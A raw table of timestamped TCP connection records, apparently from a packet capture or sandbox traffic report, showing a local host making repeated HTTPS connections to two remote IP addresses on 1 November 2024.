Nov 1, 2024 10:51:03.128834009 CET	443	49767	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.128940105 CET	443	49767	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.128988981 CET	49767	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.135045052 CET	49767	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.135045052 CET	49767	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.135051966 CET	443	49767	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.135059118 CET	443	49767	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.146074057 CET	49772	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.146121979 CET	443	49772	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.146193027 CET	49772	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.146872997 CET	49772	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.146891117 CET	443	49772	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.219749928 CET	443	49771	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.219997883 CET	443	49771	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.220082998 CET	49771	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.220289946 CET	49771	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.220300913 CET	443	49771	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.220309973 CET	49771	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.220314026 CET	443	49771	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.221770048 CET	443	49768	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.221858025 CET	443	49769	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.221995115 CET	443	49768	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.222040892 CET	49768	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.222198009 CET	443	49769	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.222239017 CET	49769	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.222670078 CET	49773	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.222692013 CET	443	49773	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.222752094 CET	49773	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.222820044 CET	49769	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.222820044 CET	49769	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.222825050 CET	443	49769	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.222831011 CET	443	49769	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.222902060 CET	49768	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.222918034 CET	443	49768	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.222927094 CET	49768	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.222933054 CET	443	49768	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.222954035 CET	443	49770	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.223000050 CET	443	49770	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.223037958 CET	49770	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.224899054 CET	49774	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.224935055 CET	443	49774	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.225008011 CET	49774	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.225055933 CET	49773	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.225068092 CET	443	49773	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.225186110 CET	49770	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.225191116 CET	443	49770	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.225213051 CET	49770	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.225215912 CET	443	49770	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.226733923 CET	49775	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.226744890 CET	443	49775	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.226807117 CET	49775	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.226936102 CET	49775	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.226941109 CET	443	49775	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.227138996 CET	49776	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.227150917 CET	443	49776	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.227200031 CET	49776	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.227267027 CET	49774	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.227284908 CET	443	49774	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.227345943 CET	49776	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.227356911 CET	443	49776	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.363128901 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.363142014 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:03.363389969 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.363688946 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.363699913 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:03.876990080 CET	443	49772	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.877404928 CET	49772	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.877437115 CET	443	49772	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.877856970 CET	49772	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.877862930 CET	443	49772	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.949955940 CET	443	49773	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.950368881 CET	49773	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.950390100 CET	443	49773	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.950738907 CET	49773	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.950742960 CET	443	49773	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.959625006 CET	443	49776	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.959857941 CET	49776	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.959886074 CET	443	49776	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.960134983 CET	49776	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.960139990 CET	443	49776	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.961994886 CET	443	49775	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.962208033 CET	49775	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.962218046 CET	443	49775	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.962500095 CET	49775	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.962503910 CET	443	49775	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.970601082 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:03.970712900 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.971795082 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.971798897 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:03.972021103 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:03.973046064 CET	443	49774	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.973167896 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.973388910 CET	49774	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.973406076 CET	443	49774	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.973754883 CET	49774	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.973759890 CET	443	49774	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.973892927 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.973927021 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:03.974092960 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.974128962 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:03.974231005 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.974265099 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:03.974389076 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.974415064 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:03.974561930 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.974596024 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:03.974742889 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.974780083 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:03.974790096 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.974944115 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.974967957 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.984378099 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:03.984523058 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.984569073 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.984577894 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:03.984586000 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.984597921 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:03.984760046 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.984814882 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.984837055 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.989011049 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:03.989094973 CET	49777	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:03.989113092 CET	443	49777	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:04.005590916 CET	443	49772	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.005846024 CET	443	49772	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.005907059 CET	49772	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.005951881 CET	49772	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.005964994 CET	443	49772	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.005975008 CET	49772	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.005980015 CET	443	49772	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.008398056 CET	49778	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.008419991 CET	443	49778	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.008486032 CET	49778	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.008614063 CET	49778	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.008620024 CET	443	49778	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.078002930 CET	443	49773	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.078350067 CET	443	49773	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.078409910 CET	49773	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.078433990 CET	49773	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.078444958 CET	443	49773	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.078454971 CET	49773	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.078459024 CET	443	49773	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.080319881 CET	49779	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.080349922 CET	443	49779	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.080415010 CET	49779	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.080535889 CET	49779	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.080549955 CET	443	49779	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.089531898 CET	443	49776	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.089854002 CET	443	49776	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.089934111 CET	49776	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.090040922 CET	49776	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.090048075 CET	443	49776	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.090071917 CET	49776	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.090075970 CET	443	49776	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.091860056 CET	49780	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.091873884 CET	443	49780	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.091937065 CET	49780	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.092046022 CET	49780	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.092056990 CET	443	49780	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.101679087 CET	443	49775	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.101793051 CET	443	49775	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.101907969 CET	49775	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.101999044 CET	49775	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.101999044 CET	49775	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.102004051 CET	443	49775	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.102010965 CET	443	49775	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.103698015 CET	49781	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.103720903 CET	443	49781	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.103785038 CET	49781	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.103899002 CET	49781	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.103913069 CET	443	49781	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.105695009 CET	443	49774	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.105798006 CET	443	49774	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.105849981 CET	49774	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.105940104 CET	49774	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.105947971 CET	443	49774	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.105956078 CET	49774	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.105959892 CET	443	49774	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.107530117 CET	49782	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.107543945 CET	443	49782	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.107606888 CET	49782	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.107745886 CET	49782	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.107755899 CET	443	49782	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.727399111 CET	443	49778	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.728249073 CET	49778	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.728260994 CET	443	49778	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.728590965 CET	49778	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.728595018 CET	443	49778	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.799474955 CET	443	49779	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.799902916 CET	49779	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.799917936 CET	443	49779	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.800342083 CET	49779	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.800348043 CET	443	49779	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.834882021 CET	443	49780	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.835345030 CET	49780	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.835361004 CET	443	49780	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.835819960 CET	49780	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.835824966 CET	443	49780	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.840887070 CET	443	49782	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.841305017 CET	49782	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.841310978 CET	443	49782	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.841664076 CET	49782	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.841667891 CET	443	49782	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.847743034 CET	443	49781	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.848149061 CET	49781	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.848169088 CET	443	49781	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.848535061 CET	49781	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.848540068 CET	443	49781	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.856481075 CET	443	49778	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.856939077 CET	443	49778	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.856988907 CET	49778	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.857048988 CET	49778	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.857060909 CET	443	49778	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.857069969 CET	49778	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.857074022 CET	443	49778	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.859332085 CET	49783	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.859359026 CET	443	49783	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.859428883 CET	49783	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.859533072 CET	49783	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.859545946 CET	443	49783	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.941809893 CET	443	49779	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.958076954 CET	443	49779	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.961301088 CET	49779	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.961483955 CET	49779	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.961493969 CET	443	49779	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.961517096 CET	49779	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.961522102 CET	443	49779	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.963435888 CET	49784	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.963464975 CET	443	49784	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.965260029 CET	49784	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.965372086 CET	49784	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.965384007 CET	443	49784	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.968082905 CET	443	49780	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.968139887 CET	443	49780	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.969249964 CET	49780	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.969278097 CET	49780	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.969278097 CET	49780	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.969290018 CET	443	49780	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.969296932 CET	443	49780	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.970804930 CET	49785	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.970841885 CET	443	49785	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.970911980 CET	49785	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.971026897 CET	49785	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.971044064 CET	443	49785	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.973803043 CET	443	49782	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.974618912 CET	443	49782	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.974675894 CET	49782	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.974709988 CET	49782	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.974714994 CET	443	49782	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.974724054 CET	49782	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.974728107 CET	443	49782	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.976397991 CET	49786	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.976408005 CET	443	49786	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.976475000 CET	49786	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.976592064 CET	49786	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.976600885 CET	443	49786	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.999419928 CET	443	49781	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.999545097 CET	443	49781	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.999598026 CET	49781	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.999634981 CET	49781	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.999648094 CET	443	49781	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:04.999658108 CET	49781	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:04.999663115 CET	443	49781	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.001343012 CET	49787	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.001359940 CET	443	49787	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.001425982 CET	49787	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.001529932 CET	49787	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.001543999 CET	443	49787	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.589380980 CET	443	49783	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.590001106 CET	49783	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.590023994 CET	443	49783	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.590693951 CET	49783	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.590701103 CET	443	49783	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.695262909 CET	443	49784	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.695707083 CET	49784	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.695724964 CET	443	49784	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.695991993 CET	49784	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.695996046 CET	443	49784	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.704657078 CET	443	49785	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.704962969 CET	49785	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.704987049 CET	443	49785	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.705337048 CET	49785	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.705342054 CET	443	49785	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.707118034 CET	443	49786	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.707400084 CET	49786	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.707406044 CET	443	49786	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.707743883 CET	49786	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.707747936 CET	443	49786	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.719804049 CET	443	49783	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.719981909 CET	443	49783	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.720045090 CET	49783	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.720200062 CET	49783	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.720200062 CET	49783	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.720217943 CET	443	49783	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.720228910 CET	443	49783	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.722668886 CET	49788	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.722697973 CET	443	49788	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.722768068 CET	49788	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.722877026 CET	49788	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.722888947 CET	443	49788	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.825093985 CET	443	49784	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.825373888 CET	443	49784	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.825428009 CET	49784	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.825464964 CET	49784	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.825475931 CET	443	49784	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.825505972 CET	49784	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.825510025 CET	443	49784	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.827770948 CET	49789	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.827817917 CET	443	49789	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.827884912 CET	49789	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.828011990 CET	49789	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.828028917 CET	443	49789	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.833920002 CET	443	49785	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.833995104 CET	443	49785	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.834047079 CET	49785	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.834171057 CET	49785	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.834186077 CET	443	49785	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.834194899 CET	49785	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.834199905 CET	443	49785	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.836095095 CET	443	49786	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.836158991 CET	49790	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.836169958 CET	443	49790	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.836225986 CET	49790	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.836236954 CET	443	49786	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.836280107 CET	49786	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.836325884 CET	49786	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.836329937 CET	443	49786	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.836343050 CET	49786	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.836344957 CET	49790	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.836345911 CET	443	49786	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.836355925 CET	443	49790	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.838021994 CET	49791	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.838032961 CET	443	49791	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:05.838109016 CET	49791	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.838222027 CET	49791	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:05.838234901 CET	443	49791	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.080244064 CET	443	49787	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.081262112 CET	49787	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:06.081273079 CET	443	49787	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:06.081790924 CET	49787	443	192.168.2.4	13.107.246.45
